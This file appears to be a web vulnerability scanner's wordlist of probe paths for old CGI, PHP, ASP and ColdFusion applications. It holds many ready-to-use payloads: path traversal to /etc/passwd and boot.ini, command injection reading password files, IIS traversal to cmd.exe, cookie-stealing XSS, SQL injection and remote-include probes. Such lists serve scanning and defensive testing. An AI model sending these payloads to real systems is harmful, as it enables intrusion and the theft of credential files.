|
bandwidth/index.cgi
|
||
|
|
bank/
|
||
|
|
banmat.pwd
|
||
|
|
banner.cgi
|
||
|
|
bannereditor.cgi
|
||
|
|
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
|
||
|
|
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
|
||
|
|
bash
|
||
|
|
basilix.php3
|
||
|
|
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
|
||
|
|
basilix/
|
||
|
|
basilix/compose-attach.php3
|
||
|
|
basilix/mbox-list.php3
|
||
|
|
basilix/message-read.php3
|
||
|
|
bb-ack.sh
|
||
|
|
bb-dnbd/faxsurvey
|
||
|
|
bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
|
||
|
|
bb-hist?HI
|
||
|
|
bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
|
||
|
|
bb-histlog.sh
|
||
|
|
bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
|
||
|
|
bb-rep.sh
|
||
|
|
bb-replog.sh
|
||
|
|
bb000001.pl<script>alert('Vulnerable')</script>
|
||
|
|
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
bbs_forum.cgi
|
||
|
|
bbv/
|
||
|
|
bc4j.html
|
||
|
|
bdata/
|
||
|
|
bdatos/
|
||
|
|
beta/
|
||
|
|
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
|
||
|
|
betsie/parserl.pl/<script>alert('XSS')</script>;
|
||
|
|
bigconf.cgi
|
||
|
|
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
|
||
|
|
bigsam_guestbook.php?displayBegin=9999...9999
|
||
|
|
billing.nsf
|
||
|
|
billing/billing.apw
|
||
|
|
bin/
|
||
|
|
bin/CGImail.exe
|
||
|
|
bin/admin.pl
|
||
|
|
bin/cfgwiz.exe
|
||
|
|
bin/common/user_update_passwd.pl
|
||
|
|
bin/contents.htm
|
||
|
|
bin/fpadmin.htm
|
||
|
|
bin/fpremadm.exe
|
||
|
|
bin/fpsrvadm.exe
|
||
|
|
bizdb1-search.cgi
|
||
|
|
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
|
||
|
|
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
|
||
|
|
blah-whatever-badfile.jsp
|
||
|
|
blah-whatever.jsp
|
||
|
|
blah123.php
|
||
|
|
blah_badfile.shtml
|
||
|
|
blahb.ida
|
||
|
|
blahb.idq
|
||
|
|
blog/
|
||
|
|
blog/mt-check.cgi
|
||
|
|
blog/mt-load.cgi
|
||
|
|
blog/mt.cfg
|
||
|
|
bmp/
|
||
|
|
bmp/JSPClient.java
|
||
|
|
bmp/README.txt
|
||
|
|
bmp/global-web-application.xml
|
||
|
|
bmp/mime.types
|
||
|
|
bmp/setconn.jsp
|
||
|
|
bmp/sqljdemo.jsp
|
||
|
|
bnbform
|
||
|
|
bnbform.cgi
|
||
|
|
board/index.php
|
||
|
|
board/philboard_admin.asp+
|
||
|
|
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
|
||
|
|
boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
|
||
|
|
book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
|
||
|
|
bookmark.nsf
|
||
|
|
books.nsf
|
||
|
|
boot/
|
||
|
|
boozt/admin/index.cgi?section=5&input=1
|
||
|
|
bottom.html
|
||
|
|
bsguest.cgi?email=x;ls
|
||
|
|
bslist.cgi?email=x;ls
|
||
|
|
buddies.blt
|
||
|
|
buddy.blt
|
||
|
|
buddylist.blt
|
||
|
|
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
|
||
|
|
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
|
||
|
|
bugtest+/+
|
||
|
|
build.cgi
|
||
|
|
bulk/bulk.cgi
|
||
|
|
busytime.nsf
|
||
|
|
buy/
|
||
|
|
buynow/
|
||
|
|
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
|
||
|
|
c/
|
||
|
|
c/winnt/system32/cmd.exe?/c+dir+/OG
|
||
|
|
c32web.exe/ChangeAdminPassword
|
||
|
|
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
|
||
|
|
c_download.cgi
|
||
|
|
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
|
||
|
|
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
|
||
|
|
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
|
||
|
|
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
|
||
|
|
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
|
||
|
|
cache-stats/
|
||
|
|
cached_feed.cgi
|
||
|
|
cachemgr.cgi
|
||
|
|
caja/
|
||
|
|
cal_make.pl?p0=../../../../../../../../../../etc
|
||
|
|
cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
|
||
|
|
calendar
|
||
|
|
calendar.nsf
|
||
|
|
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
|
||
|
|
calendar.pl
|
||
|
|
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
|
||
|
|
calendar/index.cgi
|
||
|
|
calendar_admin.pl?config=|cat%20/etc/passwd|
|
||
|
|
calender_admin.pl
|
||
|
|
campas?%0acat%0a/etc/passwd%0a
|
||
|
|
carbo.dll
|
||
|
|
card/
|
||
|
|
cards/
|
||
|
|
cart.pl
|
||
|
|
cart.pl?db='
|
||
|
|
cart/
|
||
|
|
cart32.exe
|
||
|
|
cartcart.cgi
|
||
|
|
cartmanager.cgi
|
||
|
|
cash/
|
||
|
|
catalog.nsf
|
||
|
|
catalog/includes/include_once.php
|
||
|
|
categorie.php3?cid=june
|
||
|
|
catinfo
|
||
|
|
catinfo?<u><b>TESTING
|
||
|
|
caupo/admin/admin_workspace.php
|
||
|
|
cbmc/forums.cgi
|
||
|
|
cbms/cbmsfoot.php
|
||
|
|
cbms/changepass.php
|
||
|
|
cbms/editclient.php
|
||
|
|
cbms/passgen.php
|
||
|
|
cbms/realinv.php
|
||
|
|
cbms/usersetup.php
|
||
|
|
ccard/
|
||
|
|
ccbill-local.cgi?cmd=MENU
|
||
|
|
ccbill-local.pl?cmd=MENU
|
||
|
|
ccbill/secure/ccbill.log
|
||
|
|
ccbill/whereami.cgi
|
||
|
|
cd-cgi/sscd_suncourier.pl
|
||
|
|
cd/
|
||
|
|
cdrom/
|
||
|
|
cehttp/property/
|
||
|
|
cehttp/trace
|
||
|
|
cersvr.nsf
|
||
|
|
cert/
|
||
|
|
certa.nsf
|
||
|
|
certificado/
|
||
|
|
certificate
|
||
|
|
certificates
|
||
|
|
certlog.nsf
|
||
|
|
certsrv.nsf
|
||
|
|
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
cfcache.map
|
||
|
|
cfdocs.map
|
||
|
|
cfdocs/cfcache.map
|
||
|
|
cfdocs/cfmlsyntaxcheck.cfm
|
||
|
|
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
|
||
|
|
cfdocs/exampleapp/email/application.cfm
|
||
|
|
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
|
||
|
|
cfdocs/exampleapp/publish/admin/addcontent.cfm
|
||
|
|
cfdocs/exampleapp/publish/admin/application.cfm
|
||
|
|
cfdocs/examples/httpclient/mainframeset.cfm
|
||
|
|
cfdocs/expeval/displayopenedfile.cfm
|
||
|
|
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
|
||
|
|
cfdocs/expeval/openfile.cfm
|
||
|
|
cfdocs/expeval/sendmail.cfm
|
||
|
|
cfdocs/snippets/evaluate.cfm
|
||
|
|
cfdocs/snippets/fileexists.cfm
|
||
|
|
cfdocs/snippets/gettempdirectory.cfm
|
||
|
|
cfdocs/snippets/viewexample.cfm
|
||
|
|
cfgwiz.exe
|
||
|
|
cfide/Administrator/startstop.html
|
||
|
|
cfide/administrator/index.cfm
|
||
|
|
cgforum.cgi
|
||
|
|
cgi-bin-sdb/printenv
|
||
|
|
cgi-bin/
|
||
|
|
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
|
||
|
|
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
|
||
|
|
cgi-bin/%2e%2e/abyss.conf
|
||
|
|
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
|
||
|
|
cgi-bin/.access
|
||
|
|
cgi-bin/.cobalt
|
||
|
|
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
|
||
|
|
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
|
||
|
|
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
|
||
|
|
cgi-bin/.fhp
|
||
|
|
cgi-bin/.htaccess
|
||
|
|
cgi-bin/.htaccess.old
|
||
|
|
cgi-bin/.htaccess.save
|
||
|
|
cgi-bin/.htaccess~
|
||
|
|
cgi-bin/.htpasswd
|
||
|
|
cgi-bin/.nsconfig
|
||
|
|
cgi-bin/.passwd
|
||
|
|
cgi-bin/.www_acl
|
||
|
|
cgi-bin/.wwwacl
|
||
|
|
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
|
||
|
|
cgi-bin//_vti_pvt/doctodep.btr
|
||
|
|
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/AT-admin.cgi
|
||
|
|
cgi-bin/AT-generate.cgi
|
||
|
|
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
|
||
|
|
cgi-bin/AnyBoard.cgi
|
||
|
|
cgi-bin/AnyForm
|
||
|
|
cgi-bin/AnyForm2
|
||
|
|
cgi-bin/Backup/add-passwd.cgi
|
||
|
|
cgi-bin/CGImail.exe
|
||
|
|
cgi-bin/CSMailto.cgi
|
||
|
|
cgi-bin/CSMailto/CSMailto.cgi
|
||
|
|
cgi-bin/Cgitest.exe
|
||
|
|
cgi-bin/Count.cgi
|
||
|
|
cgi-bin/DCFORMS98.CGI
|
||
|
|
cgi-bin/DCShop/auth_data/auth_user_file.txt
|
||
|
|
cgi-bin/DCShop/orders/orders.txt
|
||
|
|
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
|
||
|
|
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
|
||
|
|
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
|
||
|
|
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
|
||
|
|
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
|
||
|
|
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
|
||
|
|
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
|
||
|
|
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
|
||
|
|
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
|
||
|
|
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
|
||
|
|
cgi-bin/GW5/GWWEB.EXE
|
||
|
|
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
|
||
|
|
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
|
||
|
|
cgi-bin/GWWEB.EXE?HELP=bad-request
|
||
|
|
cgi-bin/ImageFolio/admin/admin.cgi
|
||
|
|
cgi-bin/MachineInfo
|
||
|
|
cgi-bin/MsmMask.exe
|
||
|
|
cgi-bin/MsmMask.exe?mask=/junk334
|
||
|
|
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||
|
|
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||
|
|
cgi-bin/Pbcgi.exe
|
||
|
|
cgi-bin/SGB_DIR/superguestconfig
|
||
|
|
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
|
||
|
|
cgi-bin/Upload.pl
|
||
|
|
cgi-bin/VsSetCookie.exe?
|
||
|
|
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
|
||
|
|
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
|
||
|
|
cgi-bin/WS_FTP.ini
|
||
|
|
cgi-bin/Webnews.exe
|
||
|
|
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
|
||
|
|
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
|
||
|
|
cgi-bin/add_ftp.cgi
|
||
|
|
cgi-bin/addbanner.cgi
|
||
|
|
cgi-bin/adduser.cgi
|
||
|
|
cgi-bin/admin.cgi
|
||
|
|
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/admin.php
|
||
|
|
cgi-bin/admin.php3
|
||
|
|
cgi-bin/admin.pl
|
||
|
|
cgi-bin/admin/admin.cgi
|
||
|
|
cgi-bin/admin/setup.cgi
|
||
|
|
cgi-bin/adminhot.cgi
|
||
|
|
cgi-bin/adminwww.cgi
|
||
|
|
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
|
||
|
|
cgi-bin/aglimpse
|
||
|
|
cgi-bin/aglimpse.cgi
|
||
|
|
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
|
||
|
|
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
|
||
|
|
cgi-bin/amadmin.pl
|
||
|
|
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
|
||
|
|
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
|
||
|
|
cgi-bin/anyboard.cgi
|
||
|
|
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
|
||
|
|
cgi-bin/archie
|
||
|
|
cgi-bin/architext_query.cgi
|
||
|
|
cgi-bin/architext_query.pl
|
||
|
|
cgi-bin/ash
|
||
|
|
cgi-bin/astrocam.cgi
|
||
|
|
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
|
||
|
|
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
|
||
|
|
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
|
||
|
|
cgi-bin/auctiondeluxe/auction.pl
|
||
|
|
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/auth_data/auth_user_file.txt
|
||
|
|
cgi-bin/awl/auctionweaver.pl
|
||
|
|
cgi-bin/awstats.pl
|
||
|
|
cgi-bin/awstats/awstats.pl
|
||
|
|
cgi-bin/ax-admin.cgi
|
||
|
|
cgi-bin/ax.cgi
|
||
|
|
cgi-bin/axs.cgi
|
||
|
|
cgi-bin/badmin.cgi
|
||
|
|
cgi-bin/banner.cgi
|
||
|
|
cgi-bin/bannereditor.cgi
|
||
|
|
cgi-bin/bash
|
||
|
|
cgi-bin/bb-ack.sh
|
||
|
|
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/bb-histlog.sh
|
||
|
|
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/bb-rep.sh
|
||
|
|
cgi-bin/bb-replog.sh
|
||
|
|
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
cgi-bin/bbs_forum.cgi
|
||
|
|
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
|
||
|
|
cgi-bin/bigconf.cgi
|
||
|
|
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
|
||
|
|
cgi-bin/bizdb1-search.cgi
|
||
|
|
cgi-bin/blog/
|
||
|
|
cgi-bin/blog/mt-check.cgi
|
||
|
|
cgi-bin/blog/mt-load.cgi
|
||
|
|
cgi-bin/blog/mt.cfg
|
||
|
|
cgi-bin/bnbform
|
||
|
|
cgi-bin/bnbform.cgi
|
||
|
|
cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
|
||
|
|
cgi-bin/boozt/admin/index.cgi?section=5&input=1
|
||
|
|
cgi-bin/bsguest.cgi?email=x;ls
|
||
|
|
cgi-bin/bslist.cgi?email=x;ls
|
||
|
|
cgi-bin/build.cgi
|
||
|
|
cgi-bin/bulk/bulk.cgi
|
||
|
|
cgi-bin/c32web.exe/ChangeAdminPassword
|
||
|
|
cgi-bin/c_download.cgi
|
||
|
|
cgi-bin/cached_feed.cgi
|
||
|
|
cgi-bin/cachemgr.cgi
|
||
|
|
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/calendar
|
||
|
|
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
cgi-bin/calendar.pl
|
||
|
|
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
|
||
|
|
cgi-bin/calendar/index.cgi
|
||
|
|
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
|
||
|
|
cgi-bin/calender_admin.pl
|
||
|
|
cgi-bin/campas?%0acat%0a/etc/passwd%0a
|
||
|
|
cgi-bin/cart.pl
|
||
|
|
cgi-bin/cart.pl?db='
|
||
|
|
cgi-bin/cartmanager.cgi
|
||
|
|
cgi-bin/cbmc/forums.cgi
|
||
|
|
cgi-bin/ccbill-local.cgi?cmd=MENU
|
||
|
|
cgi-bin/ccbill-local.pl?cmd=MENU
|
||
|
|
cgi-bin/cfgwiz.exe
|
||
|
|
cgi-bin/cgforum.cgi
|
||
|
|
cgi-bin/cgi-lib.pl
|
||
|
|
cgi-bin/cgi-test.exe
|
||
|
|
cgi-bin/cgi_process
|
||
|
|
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/cgicso?query=AAA
|
||
|
|
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/cgimail.exe
|
||
|
|
cgi-bin/cgitest.exe
|
||
|
|
cgi-bin/cgiwrap
|
||
|
|
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
|
||
|
|
cgi-bin/cgiwrap/~@USERS
|
||
|
|
cgi-bin/cgiwrap/~JUNK(5)
|
||
|
|
cgi-bin/cgiwrap/~root
|
||
|
|
cgi-bin/change-your-password.pl
|
||
|
|
cgi-bin/classifieds
|
||
|
|
cgi-bin/classifieds.cgi
|
||
|
|
cgi-bin/classifieds/classifieds.cgi
|
||
|
|
cgi-bin/classifieds/index.cgi
|
||
|
|
cgi-bin/clickcount.pl?view=test
|
||
|
|
cgi-bin/clickresponder.pl
|
||
|
|
cgi-bin/cmd.exe?/c+dir
|
||
|
|
cgi-bin/cmd1.exe?/c+dir
|
||
|
|
cgi-bin/code.php
|
||
|
|
cgi-bin/code.php3
|
||
|
|
cgi-bin/com5...................................................................................................................................................................................................
|
||
|
|
cgi-bin/com5.java
|
||
|
|
cgi-bin/com5.pl
|
||
|
|
cgi-bin/commandit.cgi
|
||
|
|
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
|
||
|
|
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/common/listrec.pl
|
||
|
|
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
|
||
|
|
cgi-bin/compatible.cgi
|
||
|
|
cgi-bin/contents.htm
|
||
|
|
cgi-bin/count.cgi
|
||
|
|
cgi-bin/counter-ord
|
||
|
|
cgi-bin/counterbanner
|
||
|
|
cgi-bin/counterbanner-ord
|
||
|
|
cgi-bin/counterfiglet-ord
|
||
|
|
cgi-bin/counterfiglet/nc/
|
||
|
|
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
cgi-bin/csNews.cgi
|
||
|
|
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
cgi-bin/csPassword.cgi
|
||
|
|
cgi-bin/csPassword/csPassword.cgi
|
||
|
|
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
|
||
|
|
cgi-bin/csh
|
||
|
|
cgi-bin/cstat.pl
|
||
|
|
cgi-bin/cutecast/members/
|
||
|
|
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
|
||
|
|
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
||
|
|
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
|
||
|
|
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
|
||
|
|
cgi-bin/dasp/fm_shell.asp
|
||
|
|
cgi-bin/data/fetch.php?page=
|
||
|
|
cgi-bin/date
|
||
|
|
cgi-bin/day5datacopier.cgi
|
||
|
|
cgi-bin/day5datanotifier.cgi
|
||
|
|
cgi-bin/db2www/library/document.d2w/show
|
||
|
|
cgi-bin/db4web_c/dbdirname//etc/passwd
|
||
|
|
cgi-bin/db_manager.cgi
|
||
|
|
cgi-bin/dbman/db.cgi?db=no-db
|
||
|
|
cgi-bin/dbmlparser.exe
|
||
|
|
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/dcshop/auth_data/auth_user_file.txt
|
||
|
|
cgi-bin/dcshop/orders/orders.txt
|
||
|
|
cgi-bin/dfire.cgi
|
||
|
|
cgi-bin/diagnose.cgi
|
||
|
|
cgi-bin/dig.cgi
|
||
|
|
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/displayTC.pl
|
||
|
|
cgi-bin/dnewsweb
|
||
|
|
cgi-bin/donothing
|
||
|
|
cgi-bin/dose.pl?daily&somefile.txt&|ls|
|
||
|
|
cgi-bin/dumpenv.pl
|
||
|
|
cgi-bin/echo.bat
|
||
|
|
cgi-bin/echo.bat?&dir+c:\
|
||
|
|
cgi-bin/edit.pl
|
||
|
|
cgi-bin/empower?DB=whateverwhatever
|
||
|
|
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/enter.cgi
|
||
|
|
cgi-bin/environ.cgi
|
||
|
|
cgi-bin/environ.pl
|
||
|
|
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
|
||
|
|
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
|
||
|
|
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
|
||
|
|
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
|
||
|
|
cgi-bin/ex-logger.pl
|
||
|
|
cgi-bin/excite
|
||
|
|
cgi-bin/excite;IFS=\"$\";/bin/cat
|
||
|
|
cgi-bin/ezadmin.cgi
|
||
|
|
cgi-bin/ezboard.cgi
|
||
|
|
cgi-bin/ezman.cgi
|
||
|
|
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
|
||
|
|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
|
||
|
|
cgi-bin/ezshopper2/loadpage.cgi
|
||
|
|
cgi-bin/ezshopper3/loadpage.cgi
|
||
|
|
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
|
||
|
|
cgi-bin/faxsurvey?cat%20/etc/passwd
|
||
|
|
cgi-bin/filemail
|
||
|
|
cgi-bin/filemail.pl
|
||
|
|
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
|
||
|
|
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
cgi-bin/formmail.pl
|
||
|
|
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
|
||
|
|
cgi-bin/fortune
|
||
|
|
cgi-bin/foxweb.dll
|
||
|
|
cgi-bin/foxweb.exe
|
||
|
|
cgi-bin/fpadmin.htm
|
||
|
|
cgi-bin/fpremadm.exe
|
||
|
|
cgi-bin/fpsrvadm.exe
|
||
|
|
cgi-bin/ftp.pl
|
||
|
|
cgi-bin/ftpsh
|
||
|
|
cgi-bin/gH.cgi
|
||
|
|
cgi-bin/gbadmin.cgi?action=change_adminpass
|
||
|
|
cgi-bin/gbadmin.cgi?action=change_automail
|
||
|
|
cgi-bin/gbadmin.cgi?action=colors
|
||
|
|
cgi-bin/gbadmin.cgi?action=setup
|
||
|
|
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
|
||
|
|
cgi-bin/gbpass.pl
|
||
|
|
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
|
||
|
|
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
|
||
|
|
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
|
||
|
|
cgi-bin/getdoc.cgi
|
||
|
|
cgi-bin/gettransbitmap
|
||
|
|
cgi-bin/glimpse
|
||
|
|
cgi-bin/gm-cplog.cgi
|
||
|
|
cgi-bin/gm.cgi
|
||
|
|
